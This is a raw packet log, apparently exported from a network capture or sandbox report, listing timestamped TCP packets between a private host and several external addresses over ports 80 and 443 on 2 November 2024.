Nov 2, 2024 17:56:58.979165077 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.979185104 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.979657888 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.979664087 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.051814079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.051899910 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.051913977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.052053928 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.114207983 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.114433050 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.114478111 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.114566088 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.114566088 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.150811911 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.155405045 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.155405045 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.155419111 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.155430079 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.160464048 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.160465002 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.160506964 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.160527945 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.161052942 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.161067963 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.166054964 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.166090965 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.166241884 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.168581963 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.168597937 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.194963932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.195020914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.195033073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.195102930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.195115089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.195128918 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.195132017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.195183992 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.195183992 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.253639936 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.294224977 CET	50003	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.321949959 CET	50003	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.321959019 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.324861050 CET	50003	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.324867010 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.339668036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339703083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339715004 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339759111 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339795113 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.339850903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339864016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339878082 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.339879036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339894056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.339909077 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.339956999 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.339957952 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.436992884 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.451872110 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.451909065 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.452253103 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.452760935 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.452835083 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.453840971 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.457366943 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.457438946 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.458050966 CET	50003	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.458205938 CET	50003	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.458216906 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.458250999 CET	50003	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.458256960 CET	443	50003	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.460784912 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.460846901 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.461110115 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.461580038 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.461602926 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.463617086 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.464293957 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.464313030 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.469801903 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.469808102 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.475769997 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.476144075 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.476192951 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.476608038 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.476617098 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.482331038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482343912 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482487917 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.482506037 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482538939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482552052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482568026 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.482605934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.482636929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482721090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482732058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482816935 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482839108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.482839108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.482878923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482891083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482903004 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.482908964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.482932091 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.483012915 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.483057022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.483272076 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.499331951 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.514195919 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.514223099 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.514327049 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.514343023 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.514766932 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.514780045 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.514791965 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.514914036 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.514949083 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.515096903 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.535211086 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.543406963 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.543435097 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.544872046 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.544877052 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.569449902 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.569478035 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.569811106 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.570173025 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.570183039 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.581815958 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.581840992 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.581906080 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.581907034 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.582001925 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.587222099 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.587251902 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.596153975 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.596230030 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.596472025 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.596592903 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:59.596612930 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:59.596667051 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.596704006 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.596765995 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.596796989 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.597348928 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.598200083 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.598216057 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.598226070 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.598232031 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.600749016 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.600805044 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.600883007 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.601478100 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.601495981 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.607100964 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.607194901 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.607502937 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.607542038 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.607542038 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.607567072 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.607578039 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.614217997 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.614278078 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.614645004 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.614769936 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.614787102 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.625560999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.625699043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.625742912 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.625775099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.625775099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.625808954 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.625838995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.625868082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.625869036 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.625938892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.626110077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.626136065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.626164913 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.626889944 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.654076099 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.654586077 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.654603004 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.655311108 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.655319929 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.655364990 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:59.655373096 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:59.682049036 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.682135105 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.682440042 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.682643890 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.682643890 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.682655096 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.682665110 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.685592890 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.685640097 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.686024904 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.686316967 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.686332941 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.737502098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:59.742650986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:59.949783087 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.950289965 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.950320005 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:59.950747013 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:59.950762033 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.005795002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.005815983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.005830050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.005860090 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.005873919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.005888939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.005889893 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.005901098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.005928993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.005948067 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006015062 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006066084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006093979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006105900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006153107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006153107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006197929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006208897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006221056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006238937 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006267071 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006337881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006350040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006364107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006376982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006386042 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006414890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006474018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006484032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006496906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006510019 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006525993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006540060 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006608009 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006629944 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006647110 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006653070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006694078 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006767035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006778002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006789923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006802082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006808996 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006840944 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.006941080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006967068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.006978035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007004976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007030964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007103920 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007116079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007128000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007150888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007179976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007307053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007348061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007352114 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007360935 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007373095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007385015 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007395983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007404089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007404089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007409096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007421970 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007426023 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007462978 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007462978 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.007637024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.007719994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.055639029 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.055676937 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.055710077 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.055742025 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.055758953 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.055793047 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.056229115 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.056242943 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.056256056 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.056407928 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.056452990 CET	443	50004	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.056701899 CET	50004	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.084563017 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.084640026 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.084707022 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.084933043 CET	50009	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.084949017 CET	443	50009	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.088150024 CET	50016	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.088182926 CET	443	50016	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.088285923 CET	50016	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.088423967 CET	50016	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.088452101 CET	443	50016	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.091489077 CET	50017	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.091521025 CET	443	50017	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.091681004 CET	50017	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.091865063 CET	50017	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.091880083 CET	443	50017	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.124777079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.124815941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.124829054 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.124887943 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.124932051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.124959946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.124974012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.124989986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125015974 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125026941 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125113964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125127077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125138998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125159979 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125196934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125305891 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125317097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125359058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125368118 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125368118 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125375032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125380993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125399113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125411034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125423908 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125452995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125720978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125732899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125745058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125756979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125770092 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125775099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125780106 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.125802040 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125824928 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.125996113 CET	80	49933	62.204.41.163	192.168.2.7
